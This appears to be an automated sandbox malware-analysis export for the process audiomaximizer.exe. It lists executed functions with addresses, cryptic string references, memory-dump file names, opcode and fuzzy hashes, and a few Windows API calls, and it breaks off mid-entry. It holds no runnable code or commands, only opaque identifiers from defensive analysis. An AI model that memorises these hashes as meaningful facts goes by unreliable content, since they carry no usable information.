Instruction Fuzzy Hash: 2801D671B187965FC73E12381D251576FB65FC3910B2949ABC064CF2A6CE158C4AC3AB

Analysis Process: audiomaximizer.exePID: 7556, Parent PID: 7404COMMON

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	145
Total number of Limit Nodes:	6

Executed Functions

Function 0168C146 Relevance: 6.5, Strings: 5, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 0168C38D
PH^q, xrefs: 0168C3EF
PH^q, xrefs: 0168C400
LjAp, xrefs: 0168C377
0oAp, xrefs: 0168C20A

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 70089153dd1d558c0dc86954f2023b427e4d08d3cfb305c7b31e3cd1f3fcaddd
Instruction ID: 4c3e408e7fc603c1e2a2b0d2705037524e203d4f0e6e87bd6368b50b45023cb7
Opcode Fuzzy Hash: 70089153dd1d558c0dc86954f2023b427e4d08d3cfb305c7b31e3cd1f3fcaddd
Instruction Fuzzy Hash: 1CA1C974E00218DFDB14DFAAD984A9DBBF2FF89300F14816AE409AB365DB359946CF50

Function 0168CCD8 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 0168CD4A
PH^q, xrefs: 0168CF40
PH^q, xrefs: 0168CF2F
LjAp, xrefs: 0168CECD
LjAp, xrefs: 0168CEB7

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 734266224da8d03839948ae65b6757df6eed513dad4beef8f9efd6da1508ebc1
Instruction ID: 8335bf6fbfff6d233f0b57114eb489f770a7ae42fb702b07fc756463e43dcd8c
Opcode Fuzzy Hash: 734266224da8d03839948ae65b6757df6eed513dad4beef8f9efd6da1508ebc1
Instruction Fuzzy Hash: D881A274E00218DFDB14DFAAD984A9DBBF2BF88300F14C169E419AB365DB349985CF50

Function 0168C468 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 0168C65D
PH^q, xrefs: 0168C6BF
LjAp, xrefs: 0168C647
0oAp, xrefs: 0168C4DA
PH^q, xrefs: 0168C6D0

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 96cced1fab01acdeb48aa5f66650c16d8cc0a904e2b667c3a708e4fea15287bf
Instruction ID: 17b782cfcb73b9035eb8371c45c776db1cbcad71dc3796525c7015d1411ec030
Opcode Fuzzy Hash: 96cced1fab01acdeb48aa5f66650c16d8cc0a904e2b667c3a708e4fea15287bf
Instruction Fuzzy Hash: 0481A574E00218CFDB14DFAAD984A9DBBF2BF88304F14D16AE419AB365DB349981CF51

Function 01685370 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 016853E2
LjAp, xrefs: 01685550
PH^q, xrefs: 016855D9
PH^q, xrefs: 016855C8
LjAp, xrefs: 01685566

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 8fcd8b8542963a45473733e64fc6023f5e32987ac4aebbee9bb237750cae8c5a
Instruction ID: 299b2f9efd4b4d6a094b99624b4f7069e4b12408976bd444643cc78fde1de639
Opcode Fuzzy Hash: 8fcd8b8542963a45473733e64fc6023f5e32987ac4aebbee9bb237750cae8c5a
Instruction Fuzzy Hash: 0981B274E01218DFDB14DFAAD984A9DBBF2BF88300F14C169E809AB365DB349985CF51

Function 0168C738 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 0168C7AA
PH^q, xrefs: 0168C9A0
LjAp, xrefs: 0168C92D
PH^q, xrefs: 0168C98F
LjAp, xrefs: 0168C917

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: a7af342a1ba78265aab9f797e18b03440688d9d16d63d90c422b8163115a6f63
Instruction ID: 0617931008f531ea7362309c9c082bb32fb72adb31840d88b7663bff6294f4af
Opcode Fuzzy Hash: a7af342a1ba78265aab9f797e18b03440688d9d16d63d90c422b8163115a6f63
Instruction Fuzzy Hash: 6781B474E00218CFDB14DFAAD984A9DBBF2BF88310F14D16AE419AB365DB349985CF50

Function 0168D278 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 0168D4CF
LjAp, xrefs: 0168D46D
0oAp, xrefs: 0168D2EA
LjAp, xrefs: 0168D457
PH^q, xrefs: 0168D4E0

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 9ac6c1a27e172df93441ac08902a4bd838783cc8930a835bfea13b5933fbeb3d
Instruction ID: 65ac6012bcb3d4f1a8172f54aed39342356314fe142b08f6d694fce83d860ecb
Opcode Fuzzy Hash: 9ac6c1a27e172df93441ac08902a4bd838783cc8930a835bfea13b5933fbeb3d
Instruction Fuzzy Hash: 0581C374E01218DFDB14DFAAD984A9DBBF2BF89300F14C169E419AB365DB34A981CF50

Function 0168CFA9 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 0168D187
PH^q, xrefs: 0168D210
LjAp, xrefs: 0168D19D
PH^q, xrefs: 0168D1FF
0oAp, xrefs: 0168D01A

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 03d4ad3f4415f8f2bb930f41365c99ac65f7528e060f1c9bd87150066a796327
Instruction ID: 284cfb672eaf7f90281bcd3ef983eadd52585f6541e70eb8bd3a3c29a5b5c381
Opcode Fuzzy Hash: 03d4ad3f4415f8f2bb930f41365c99ac65f7528e060f1c9bd87150066a796327
Instruction Fuzzy Hash: 6581B274E00218CFDB54DFAAD984A9DBBF2BF88300F14C169E859AB365DB349985CF50

Function 0168CA08 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 0168CC70
LjAp, xrefs: 0168CBE7
LjAp, xrefs: 0168CBFD
0oAp, xrefs: 0168CA7A
PH^q, xrefs: 0168CC5F

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 482ed3300be37c54de31564d104b7ddec5cff9972356fe8cee20f653174645a4
Instruction ID: b3e6e51572fbd4ccb1f45b63643b6e8171e8c84fbe153e609e6bc693ca67e472
Opcode Fuzzy Hash: 482ed3300be37c54de31564d104b7ddec5cff9972356fe8cee20f653174645a4
Instruction Fuzzy Hash: 0D81B274E00618CFDB14DFAAD994A9DBBF2BF88300F14C169E819AB365DB359981CF50

Function 01686FC8 Relevance: 5.5, Strings: 4, Instructions: 486
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 01687212
(o^q, xrefs: 01687220
,bq, xrefs: 01687298
,bq, xrefs: 0168728A

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 74775790d4c2406887e2eaa37219cea96ac6088209c2b62bc38b7ef8b25664a4
Instruction ID: 4a88df002923b2dd4a5d3ba24c06c368a9dff4fc253aa63b79c95ded30961fc0
Opcode Fuzzy Hash: 74775790d4c2406887e2eaa37219cea96ac6088209c2b62bc38b7ef8b25664a4
Instruction Fuzzy Hash: 46125D70A00209CFDB15DF69CC84AADBBF6BF88314F258569E905AB361DB31ED41CB61

Function 0168A088 Relevance: 3.4, Strings: 2, Instructions: 900COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0168AB13
(o^q, xrefs: 0168A518

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: e5ccccce35d0f11fd6368852cd9aeca1f3321f78bb4cf1de25968356931a5be5
Instruction ID: 0aa14986c785a7aca7a9ea9514d5eca5261fbdad873fb9829ca74ff723713b2a
Opcode Fuzzy Hash: e5ccccce35d0f11fd6368852cd9aeca1f3321f78bb4cf1de25968356931a5be5
Instruction Fuzzy Hash: 83827031600209DFCB15DFA8C984AAEBBF2FF88310F15865AE9459B366D730ED91CB51

Function 016869A0 Relevance: 3.0, Strings: 2, Instructions: 517COMMON

Download Yara Rule

Strings

Hbq, xrefs: 01686DA6
(o^q, xrefs: 01686EDA

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 2b3006f73a1e11bdd5b5e66362704a8436095b752384bc6e0c9496dd2a974a20
Instruction ID: 0f72a44aacadfc71e463518904b2184cc306d93f5a8f2d6bf32b0db050098945
Opcode Fuzzy Hash: 2b3006f73a1e11bdd5b5e66362704a8436095b752384bc6e0c9496dd2a974a20
Instruction Fuzzy Hash: DF127E71A002199FDB15DF69CC54AAEBBF6FF88300F248569E905AB395DB309D42CB90

Function 01683E09 Relevance: 2.9, Strings: 2, Instructions: 427COMMON

Download Yara Rule

Strings

Xbq, xrefs: 01683E47
$^q, xrefs: 01683E2E

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 04e90b1d1fe51f217d4d8140e6437244ad7dc191a0e32e5b4594285588c5ed35
Instruction ID: 2366f3a5d25fe2c27ecf01ea7249fceb96ad6f99b81c12847a273a80f737c8a4
Opcode Fuzzy Hash: 04e90b1d1fe51f217d4d8140e6437244ad7dc191a0e32e5b4594285588c5ed35
Instruction Fuzzy Hash: 67F13E74E04209DFDB18EFB9D8546AEBBB2FF88310B14866DE406A7354DF359802CB95

Function 06ED9E08 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4176023569.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6ed0000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1941d6aa464c336a984a4585033b58a79791a9053b5b2ce149acd58d98331db0
Instruction ID: a8071ee6d5afd1ccd82c6f418c4eb6a7b96164adf1977e265e8b5c569d730850
Opcode Fuzzy Hash: 1941d6aa464c336a984a4585033b58a79791a9053b5b2ce149acd58d98331db0
Instruction Fuzzy Hash: 9ED19D74E01218CFDB54DFA5D994B9DBBB2FB88300F2091A9D418AB3A4DB359E81CF50

Function 0168E97A Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3215ee5f27189888d563ef36ffce7e7e518108852a85eda26fcdf804e7866550
Instruction ID: 34b22acca7aff25bd88e3e76b3afacb5d79f2e0baf973aa5ae17f2a1574b3bc8
Opcode Fuzzy Hash: 3215ee5f27189888d563ef36ffce7e7e518108852a85eda26fcdf804e7866550
Instruction Fuzzy Hash: 16519674E00208DFDB18DFAAD994A9DBBB2FF88300F24C129E815AB365DB359945CF54

Function 0168E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5855b673c8afdb1c8b2c2c898998c45d9cda3fd963c433f4c3067a04d0b88f
Instruction ID: 7f9c15553fcc78afb58cffeac49fcddf6eaf2553c68b6fb6acde9208bd311ceb
Opcode Fuzzy Hash: 1f5855b673c8afdb1c8b2c2c898998c45d9cda3fd963c433f4c3067a04d0b88f
Instruction Fuzzy Hash: B6519474E00208DFDB18DFAAD984A9DBBB2FF88300F248529E815AB364DB359945CF54

Function 06ED9DF7 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4176023569.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6ed0000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef334deff7756f8f1dc3baef4c52870f504ccb7c27a9e4d37533acff812e948
Instruction ID: 3e9316ccf61f86c61b4051e2bf221031e7f470dc8c99c15e7907553c31e834da
Opcode Fuzzy Hash: bef334deff7756f8f1dc3baef4c52870f504ccb7c27a9e4d37533acff812e948
Instruction Fuzzy Hash: 0D4104B0E002188BDB58DFAAD8446EEBBF2BF89304F10D02AD418BB254EB345942CF50

Function 016876F1 Relevance: 10.5, Strings: 8, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 01687BFF
,bq, xrefs: 01687BA0
(o^q, xrefs: 01687C0F
(o^q, xrefs: 016878B2
(o^q, xrefs: 01687815
,bq, xrefs: 01687B90
(o^q, xrefs: 016877E9
(o^q, xrefs: 0168772E

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 72bd8179c379a39014542ea1b40d8797f99c3b36202eb09b25ec5bd069fa9b50
Instruction ID: b016ea5b77d936118675bb7ff3522c0b01ad3f8bbe2de7aa200fcdf493a1735d
Opcode Fuzzy Hash: 72bd8179c379a39014542ea1b40d8797f99c3b36202eb09b25ec5bd069fa9b50
Instruction Fuzzy Hash: 0B125C30A002098FCB25EF68D984AAEBBF2FF49314F2586A9E5559B361D730ED45CB50

Function 016829EC Relevance: 5.3, Strings: 4, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 01682BA4
Xbq, xrefs: 01682A9E
Xbq, xrefs: 01682AD8
Xbq, xrefs: 01682B57

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: f3b78a3e28608ebbdf886bf9b85d92330539221919fd09c8c8380500ddd7ad07
Instruction ID: 7b5ded95f2ec4543c473356a9b09d7734f80a4d25c583dbaf45274fdea262140
Opcode Fuzzy Hash: f3b78a3e28608ebbdf886bf9b85d92330539221919fd09c8c8380500ddd7ad07
Instruction Fuzzy Hash: 93A13471D003288FDF619F688C946AEBBB1FF84310F504AAED545A7355EB318D81CB92

Function 01685F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

Hbq, xrefs: 01686056
Hbq, xrefs: 01686023

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 102b2c29d7042245d2339d088417a8af0a3fbba12ee8c7d9493661bdceb20e86
Instruction ID: afce290092d40db9f1b8e27dbaffa5a76ab0fd046bb7f1a41c146244a4790abd
Opcode Fuzzy Hash: 102b2c29d7042245d2339d088417a8af0a3fbba12ee8c7d9493661bdceb20e86
Instruction Fuzzy Hash: C891BE303042458FDB16AF69CC94A6E7BF6BF89301F148669E9468B396CF35DC42CB91

Function 01686498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

,bq, xrefs: 01686578
,bq, xrefs: 0168656E

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 33c3ae0550ed7d36c0876002b2085237f01141711cf9f40917a0a95d4c0ec6a2
Instruction ID: 18c851dddb7f3baa5b4849c34dd7ff47d033489fd3f0275ed8a51c21ea02d883
Opcode Fuzzy Hash: 33c3ae0550ed7d36c0876002b2085237f01141711cf9f40917a0a95d4c0ec6a2
Instruction Fuzzy Hash: AA81A130A00515CFCB14EF6DCC849AABBB2FF89314B158669D506EB365DB31EC81CB62

Function 01689C30 Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01689D6D
4'^q, xrefs: 01689D84

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: bfd1530ac4b9b15ee69e40d1995a57d086cfacb255fff9b88198ef741d1fd5dd
Instruction ID: aee516d69ea408216f9d77c14c7e1a04ea7cceabb73538747ddd62771a54685b
Opcode Fuzzy Hash: bfd1530ac4b9b15ee69e40d1995a57d086cfacb255fff9b88198ef741d1fd5dd
Instruction Fuzzy Hash: 0B519C317002459FDB01AF68CC44B7ABBE6EB88318F048566E909CB356EB31DC42CB51

Function 01683CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xbq, xrefs: 01683CF6
Xbq, xrefs: 01683CCD

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: 829eb081e12818019da2a12fdc0fc4cce0195962249b75b7bc4574291abcd6bc
Instruction ID: 56d8f9f558cbdafb114d79dafd846d9f8306370d3de72fea94034d87c68de69c
Opcode Fuzzy Hash: 829eb081e12818019da2a12fdc0fc4cce0195962249b75b7bc4574291abcd6bc
Instruction Fuzzy Hash: 5831E4337043258BDF286E6E8D9427EB9AABBC4B01F184639D906D3394DBB5CC468791

Function 01688EF8 Relevance: 2.6, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

$^q, xrefs: 01688FB4
$^q, xrefs: 01688FD7

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 42be1473ecfd7babaa37c4bb3084ce804bec8d99e48035cb59c98f976e335bf4
Instruction ID: 58ff668ff67d6eb3b2d3bee7e894c9aab844c6f0e18e9e96ae10fa7d0634db62
Opcode Fuzzy Hash: 42be1473ecfd7babaa37c4bb3084ce804bec8d99e48035cb59c98f976e335bf4
Instruction Fuzzy Hash: 9431C1303041518FDB3AAB3D9C9053E7BABBB84780B555A6AF242CB252DF29DC82C751

Function 01680C8F Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01680F19

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: f7acd382f7effff80278beb8c3d9ba672ea253a3c3549bb79c3bc4e4f4a7fcfa
Instruction ID: 8f3d626a95ef9c9ad0dc6f52a6406bf5f401820d9396bda78ba2824a6e3f0135
Opcode Fuzzy Hash: f7acd382f7effff80278beb8c3d9ba672ea253a3c3549bb79c3bc4e4f4a7fcfa
Instruction Fuzzy Hash: 8352A974900219CFCB64DF68ED98ADDBBB2FB48301F1095A9D409A7364DB386E85CF85

Function 01680CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01680F19

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 4af5dafc952f165784ad1fa3695da3ed651eed01833d3ee1789746f77a3323ca
Instruction ID: 04fc5a7bdee8845d611d4c7305a9e5012e8e846e4000ccc43011030e4d371f2a
Opcode Fuzzy Hash: 4af5dafc952f165784ad1fa3695da3ed651eed01833d3ee1789746f77a3323ca
Instruction Fuzzy Hash: 7652A974900219CFCB64DF68ED98ADDBBB2FB48301F1095A9D409A7364DB386E85CF85

Function 073F0E88 Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000014,?,?,040B42A8,031BF1F0,?,00000000), ref: 073F0FE6

Memory Dump Source

Source File: 00000008.00000002.4179800089.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73f0000_audiomaximizer.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b2b8740bb765438db2dc785068f2193bb5c7de0c51f370962513100c9c9879f7
Instruction ID: 193dcd917b5de18321bff243cfce261fb03e8de2a8adcf31d2e0edc4b56b3239
Opcode Fuzzy Hash: b2b8740bb765438db2dc785068f2193bb5c7de0c51f370962513100c9c9879f7
Instruction Fuzzy Hash: DF718F74A01209EFDB14DF69D894D9EBBB6BF48750F114098FA05AB361D731EC81CB50

Function 074606D0 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07460787

Memory Dump Source

Source File: 00000008.00000002.4180867299.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7460000_audiomaximizer.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6a6e43cc6d51dbc36e9663065cdebb7d749a551dfdb434de2988651015596106
Instruction ID: 10aa2daf40071fe3dc10072974e43ee83731b75b54d3bab557cfea3861063844
Opcode Fuzzy Hash: 6a6e43cc6d51dbc36e9663065cdebb7d749a551dfdb434de2988651015596106
Instruction Fuzzy Hash: 05315CB4A00265CFCB10DF69C448AEEBBB5BF48B15F1445AAD905AB361DB34E841CFD2

Function 073F28A8 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 073F2926

Memory Dump Source

Source File: 00000008.00000002.4179800089.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73f0000_audiomaximizer.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 2148b01d6dfac555360dbbb7c0d5c1ce5bc7e0011e7a2190a5052b17a7b3e931
Instruction ID: df8f21638999c047fafade4b4b614d0905173d4d0e97e07d964b57425771f689
Opcode Fuzzy Hash: 2148b01d6dfac555360dbbb7c0d5c1ce5bc7e0011e7a2190a5052b17a7b3e931
Instruction Fuzzy Hash: 1121DEB5B001019FEB14DB69D811BEEB7A6FFC8354F048178E60DA7391CB34A921CB94

Function 074606C0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07460787

Memory Dump Source

Source File: 00000008.00000002.4180867299.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7460000_audiomaximizer.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6fcafaee47d02ce0a60df77b4f1683c710182222193875f0fa68af851c5a945e
Instruction ID: 588c2fe6806bb14b9c1b11466d2a4219057fcb226f5f29c74db650f4b4e70584
Opcode Fuzzy Hash: 6fcafaee47d02ce0a60df77b4f1683c710182222193875f0fa68af851c5a945e
Instruction Fuzzy Hash: 292139B99002598FDB109F65C448AEEFBB4FB08711F1485AAE504A7751C734A984CFE2

Function 05D07390 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05D0735E,?,?,?,?,?), ref: 05D0741F

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 79ac25006890637e191e1bf4e958b396a7e7b504c25b129806ac12c8b5d05b9f
Instruction ID: e2edac7b07466e936c3a9485c7d004c8982bd738e9e37088efa557f346ba1f95
Opcode Fuzzy Hash: 79ac25006890637e191e1bf4e958b396a7e7b504c25b129806ac12c8b5d05b9f
Instruction Fuzzy Hash: 732116B59002199FDB10CFA9D984ADEFFF8FB48310F14802AE918A7350C378A944CFA4

Function 05D06FC4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05D0735E,?,?,?,?,?), ref: 05D0741F

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

